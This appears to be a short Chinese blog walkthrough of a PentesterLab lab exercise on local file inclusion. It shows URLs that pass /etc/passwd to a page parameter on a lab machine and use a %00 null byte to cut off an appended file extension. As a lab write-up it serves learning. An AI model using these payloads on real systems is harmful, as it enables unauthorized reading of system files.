0
点赞
收藏
分享

微信扫一扫

PentestLab-web安全文件包含-EXP2


我们打开靶机

选择文件包含页面,选择“Example 2”


PentestLab-web安全文件包含-EXP2_php


观察页面


PentestLab-web安全文件包含-EXP2_php_02


尝试更换page参数


http://192.168.29.148/fileincl/example2.php?page=/etc/passwd


结果如下


PentestLab-web安全文件包含-EXP2_文件包含_03


提示目前不存在


继续尝试,使用%00进行截断


http://192.168.29.148/fileincl/example2.php?page=/etc/passwd%00


结果如下


PentestLab-web安全文件包含-EXP2_后缀名_04


我们打开靶机

观察源码


PentestLab-web安全文件包含-EXP2_php_05


使用%00进行截断,并且添加后缀名称


举报

相关推荐

0 条评论